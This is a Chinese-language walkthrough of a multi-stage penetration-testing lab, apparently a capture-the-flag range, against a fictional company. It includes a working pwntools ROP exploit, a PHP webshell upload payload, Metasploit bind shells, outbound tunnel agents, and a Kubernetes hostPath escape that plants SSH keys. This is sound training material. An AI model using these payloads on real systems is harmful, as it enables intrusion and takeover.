
靶标介绍
在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务,然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务,从而控制整个内部网络。靶场中共设置了6个Flag,它们分布在不同的靶机上,您需要找到并获取这些 Flag 作为您的成就目标。
first-flag
开头得到一个IP,信息搜集
8.130.86.165
nmap探测一下
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-17 16:18 中国标准时间
Nmap scan report for 8.130.86.165
Host is up (0.029s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1024/tcp filtered kdm
1025/tcp filtered NFS-or-IIS
1033/tcp filtered netinfo
1068/tcp filtered instl_bootc
1433/tcp filtered ms-sql-s
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6667/tcp filtered irc
8080/tcp open http-proxy
80和8080各有一个web服务,80是个网站的官网,8080是个登录入口,如下


弱口令等基础漏洞无果,扫描一下目录
---- Scanning URL: http://8.130.86.165/ ----
==> DIRECTORY: http://8.130.86.165/css/
==> DIRECTORY: http://8.130.86.165/fonts/
==> DIRECTORY: http://8.130.86.165/images/
+ http://8.130.86.165/index.html (CODE:200|SIZE:10887)
==> DIRECTORY: http://8.130.86.165/js/
+ http://8.130.86.165/server-status (CODE:403|SIZE:277)
---- Entering directory: http://8.130.86.165/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
都是一些不重要的路径,8080如下,也是没啥关键信息
---- Scanning URL: http://8.130.86.165:8080/ ----
+ http://8.130.86.165:8080/index.php (CODE:200|SIZE:1027)
+ http://8.130.86.165:8080/robots.txt (CODE:200|SIZE:24)
+ http://8.130.86.165:8080/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://8.130.86.165:8080/static/
直接用fscan扫描一下,发现登录入口是存在TP5.0.23的RCE漏洞的,工具一把梭
start vulscan
[*] WebTitle: http://8.130.86.165 code:200 len:10887 title:None
[*] WebTitle: http://8.130.86.165:8080 code:200 len:1027 title:Login Form
[+] http://8.130.86.165:8080 poc-yaml-thinkphp5023-method-rce poc1
在根目录下得到flag1
/f1ag01_UdEv.txt
flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
查看网卡信息
(www-data:/var/www/html/background/public) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.28.23.17 netmask 255.255.0.0 broadcast 172.28.255.255
inet6 fe80::216:3eff:fe03:f089 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:03:f0:89 txqueuelen 1000 (Ethernet)
RX packets 110635 bytes 75481457 (75.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 70843 bytes 22069897 (22.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1308 bytes 127326 (127.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1308 bytes 127326 (127.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
上传fscan扫描网段服务
./fscan -h 172.28.23.17/24
扫到内网服务,结果如下
172.28.23.26:80 open
172.28.23.17:80 open
172.28.23.17:22 open
172.28.23.26:22 open
172.28.23.33:22 open
172.28.23.26:21 open
172.28.23.33:8080 open
172.28.23.17:8080 open
[*] WebTitle: http://172.28.23.17:8080 code:200 len:1027 title:Login Form
[*] WebTitle: http://172.28.23.26 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[*] WebTitle: http://172.28.23.17 code:200 len:10887 title:None
[+] ftp://172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle: http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A
[*] WebTitle: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A code:200 len:3860 title:智联科技 ERP 后台登陆
[+] http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2
搭建内网代理,这里使用msf搭建,先生成一个msf正向马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy
开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 8.130.86.165
set lport 53857
run
添加内网路由
run post/multi/manage/autoroute
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 172.28.255.253 100 eth0
172.28.0.0 255.255.0.0 0.0.0.0 0 eth0
172.28.255.253 0.0.0.0 0.0.0.0 100 eth0
No IPv6 routes were found.
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.28.23.17
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.28.0.0/255.255.0.0 from host's routing table.
成功上线shell,搭建socks5代理
192.168.72.149 1080
second-flag
开始内网的服务访问,首先先根据fscan扫描的结果定向访问
http://172.28.23.33:8080
这地址存在heapdump泄露,先搞这个

看这个路径不难发现大概是shiro框架,抓包测试的确发现了shiro特征

扫描找heapdump
/actuator/env
/actuator/heapdump
使用工具快速分析提取关键数据,可以得到shiro的key

CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
工具走代理,填充key爆破链子即可
这里需要注意工具这里需要勾选上AES GCM,因为泄露出来的algMode = GCM

命令执行,写入内存马

冰蝎[Filter] 注入成功!
路径:http://172.28.23.33:8080/1.ico
密码:123
成功RCE

查看网卡情况,发现存在双网卡,也就是存在内网服务
/ >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.28.23.33 netmask 255.255.0.0 broadcast 172.28.255.255
inet6 fe80::216:3eff:fe04:93d5 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:93:d5 txqueuelen 1000 (Ethernet)
RX packets 95489 bytes 82892482 (82.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 46479 bytes 544617803 (544.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.10.16 netmask 255.255.255.0 broadcast 172.22.10.255
inet6 fe80::216:3eff:fe04:62e prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:06:2e txqueuelen 1000 (Ethernet)
RX packets 687 bytes 28854 (28.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 702 bytes 30000 (30.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1308 bytes 133017 (133.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1308 bytes 133017 (133.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
查看端口开放情况
/ >netstat -anupl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
/ >netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 649/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
发现有个高端位的服务,尝试发现是PWN服务,exp如下
from pwn import *
context.arch='amd64'
def add(key,data='b'):
p.sendlineafter(b'Option:',b'1')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def show(key):
p.sendlineafter(b'Option:',b'2')
p.sendlineafter(b"Key: ",key);
def edit(key,data):
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def name(username):
p.sendlineafter(b'Option:',b'4')
p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
0:username+0x10,
0x10:[username+0x20,len(ukey),\
ukey,0],
0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
0:username+0x20,
0x20:[username+0x30,len(ukey),\
ukey,0],
0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
rdi,username+0x50,
rsi,0,
rdx,0,0,
rax,0x3b,
syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()

flag03:flag{6a326f94-6526-4586-8233-152d137281fd}
third-flag
上传fscan扫描一下另外一个网段
./fscan -h 172.22.10.16/24
结果如下,没啥价值内容
172.22.10.16:8080 open
172.22.10.28:3306 open
172.22.10.28:80 open
172.22.10.16:22 open
172.22.10.28:22 open
[*] WebTitle: http://172.22.10.16:8080 code:302 len:0 title:None 跳转url: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549
[*] WebTitle: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549 code:200 len:3860 title:智联科技 ERP 后台登陆
[*] WebTitle: http://172.22.10.28 code:200 len:1975 title:DooTask
[+] http://172.22.10.16:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.22.10.16:8080 poc-yaml-springboot-env-unauth spring2
同时有个FTP未授权,直接走代理把OA源码拖下来

这样FTP有个注意点就是我这里用的是winscp这个工具,对于所有工具,未授权连接FTP的时候,走代理的场景下是需要开启被动模式的,要不然就连接不上FTP服务器,当然了如果记不住是要开启被动模式还是关闭,那就都试一试,在这里说这就是为了要记住有个FTP连接的被动模式的情况。
审计OA代码,考察代码审计
uploadbase64.php此处可以上传文件,代码如下
<?php
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
限制格式必须得是data读取base64编码内容
data:image/jpg;base64,xxx

成功上传PHP木马
imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==

有很多disfunction,直接用蚁剑插件绕过即可
/upload/.antproxy.php直接这样访问显示404,修改一下/upload/的源码内容,路径加一个uploads/

这里发现还是不能提权连接.antproxy.php,把木马文件中的POST改成GET,路径也改一下,然后get传参命令执行就可以,得到这个服务器的一个flag

读文件的好多命令也给过滤了,应该是需要提权,毕竟www权限太低,可以看一下suid
find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep
发现base32在里面,那就不用提权了,直接用base32读文件即可
这里用base32来读取flag
http://172.28.23.26/upload/.antproxy.php?1=echo `base32 /flag02.txt`;
MZWGCZZQGI5CAZTMMFTXWNJWMQZTONZTGQWTKZRXGMWTINBXMYWWEMLBGUWWCOBTMY2DKNJUHFRD EOD5BI======
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
fourth-flag
看一下这个靶机的网卡情况
eth0 Link encap:Ethernet HWaddr 00:16:3e:04:5b:6e
inet addr:172.28.23.26 Bcast:172.28.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe04:5b6e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:59474 errors:0 dropped:0 overruns:0 frame:0
TX packets:23798 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:62043614 (62.0 MB) TX bytes:16736593 (16.7 MB)
eth1 Link encap:Ethernet HWaddr 00:16:3e:03:fe:6e
inet addr:172.22.14.6 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe03:fe6e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1362 errors:0 dropped:0 overruns:0 frame:0
TX packets:1366 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:58300 (58.3 KB) TX bytes:58332 (58.3 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:691 errors:0 dropped:0 overruns:0 frame:0
TX packets:691 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:76373 (76.3 KB) TX bytes:76373 (76.3 KB)
也是双网卡结构,上传fscan来扫描另外一个网段,同时正向马上线msf,蚁剑一点命令都执行不了,直接用刚才那个GET马来上线msf和执行fscan
cd /tmp;chmod +x fscan;./fscan -h 172.22.14.6/24
这里需要用第二个msf,走第一个msf的第一层代理才能正向监听到shell
同样的操作,先生成正向马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 172.28.23.26
set lport 53857
run

成功得到shell,在这一个msf上加这一层路由,即可继续内网渗透,当然还是先fscan扫描一下
chmod 777 /tmp/fscan
cd /tmp;./fscan -h 172.22.14.6/24
到这里,最开始的shell掉线了而且一直连不上了,这里重新生成一个新端口的正向马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53858 -f elf > hzy
刚才扫的结果在重新代理之后也是获取到了,如下
172.22.14.6:80 open
172.22.14.6:22 open
172.22.14.37:10250 open
172.22.14.46:22 open
172.22.14.37:22 open
172.22.14.37:2379 open
172.22.14.46:80 open
172.22.14.6:21 open
[*] WebTitle: http://172.22.14.46 code:200 len:785 title:Harbor
[*] WebTitle: http://172.22.14.6 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] InfoScan:http://172.22.14.46 [Harbor]
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19 title:None
[+] ftp://172.22.14.6:21:anonymous
[->]OASystem.zip
[+] http://172.22.14.46/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]
这里也是放弃MSF了,用frp或者stowaway,这俩比较稳定,后者搭建内网代理更是既稳定又方便,这里我用VPS,比赛的时候可以用自己的私网IP
第一层边缘机上传linux_x64_agent
./linux_x64_agent -c VPS:9999
VPS执行如下
./linux_x64_admin -l 9999
socks 5555
开启socks5代理
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Socks start successfully!
直接用新翔OA (172.28.23.26)连接到ThinkPHP (172.28.23.17),做第二层代理
(admin) >> use 0
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 1111
[*] Waiting for response......
[*] Node is listening on 1111
然后在172.28.23.26这上传linux_x64_agent,然后执行如下命令
./linux_x64_agent -c 172.28.23.17:1111
执行之后即可接收到一个node
(node 0) >>
[*] New node come! Node id is 2
这个时候前边开的socks5就会自动加上172.28.23.26的网卡,直接访问服务即可,如下
http://172.22.14.46

harbor未授权,CVE-2022-46463,直接打
>python harbor.py
usage: harbor.py [-h] [--v2] [--dump IMAGENAME | --tags | --dump_all] url
harbor.py: error: the following arguments are required: url
>python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
>python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
[+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
得到flag

flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
fifth-flag
上边还有一个服务DooTask
http://172.22.10.28

dump下来[+] project/projectadmin这个镜像,里面是dootask的源码jar包


反编译之后发现数据库连接信息泄露
BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
直接走代理连接即可,这里用Multiple.Database.Utilization.Tools这个工具,它可以连接之后直接尝试一些提权操作,节约时间

一键提权成功

得到flag6

flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}
sixth-flag
这个不容易发现,前面最开始是扫到了一个高端位的404的web服务的
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19 title:None

这里没了解过的真的无从下手,考察的是K8S Kubelet未授权访问漏洞,特征就是10250端口开放,不过这里10250没办法利用,目前知道是K8s,可以试一试其他端口的未授权,比如10255,6443等等,这里访问6443的时候存在接口泄露

接着就是利用漏洞了,编辑恶意yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
先在win下安装kubectl.exe,后续需要利用到
https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-windows/
部署pod
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment configured
列出pod
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-pfhwq 1/1 Running 0 35s
进容器建shell
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: 1
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
成功shell,然后写公钥
公钥是ssh-keygen -t rsa -b 4096产生的id_rsa.pub
ssh-keygen -t rsa -b 4096
cat /home/kali/.ssh/id_rsa.pub //这个内容就是
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC0KpzPU1zUkOYCXEe+ZNp8IBjpTOJVzWyrd44BQC9weUhK2UDXvg+dh65IH1UrQk1jzfa4r5DHhRRn0jhtcUZINF7LGvz1EiV90P7y+qg3D6bn3oTGat2qLElC0cRZA9ZIycyRCXl18c7vGl9453K0WIJtha3aptoZ5ZYpJAil+MmEQ+J/PSn0Nj41UeatFmsCht9lCo6Fm2zhIjWInF4E/hou5V97VUS77bEPmGMW1cT6WkZpBnO6PjjtgEyEucwTXCOS0PUbeUjjeMw5kZduiwAkQZ3S8Rzys9JQor6NJOe4KB4mYD/Vk1EWJnMDxN51VjDNGDP5qCy6Za45imXdFm15/fdiOodJyIygQCL/oqpSqjHwSAuNEU7GhPu+kwBNe2/O09qgjfNRKPKbkPf2PuqkUPLnRlURAzmuXi9+aHfnH0pT15pSYCHqBlNiYSts/izH3fnB3Kf0SLvpLvnPQzP3abWqKJcERjpBjdY5EB5b7VIR6Ka1IJPlGtDvyiFiw7dm9sHixOfIKPe3ZV2Qfbs+7l1xhfcpA2blOx6j/LUnm/UX3JpaUAIJJx1+arJreNXd16ox+ILhHUIx8QYMQLvDrLDpmIcSAwdG9gqNZAgvkVkrymY4utBIcyRojM9Hr7MAnKzq/ZSKDU0qXW9KjXWTgdzKgtn4dp49+0MyQw== kali@kali" > /mnt/root/.ssh/authorized_keys
接着利用私钥连上去
proxychains ssh -i /home/kali/.ssh/id_rsa root@172.22.14.37

获得root权限,数据库弱口令
mysql -uroot -p
root
去mysql找到flag
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flaghaha |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use flaghaha;
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04 |
+--------------------+
1 row in set (0.01 sec)
mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id | f1agggggishere |
+------+--------------------------------------------------------------+
| 1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
得到flag
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}
OVER
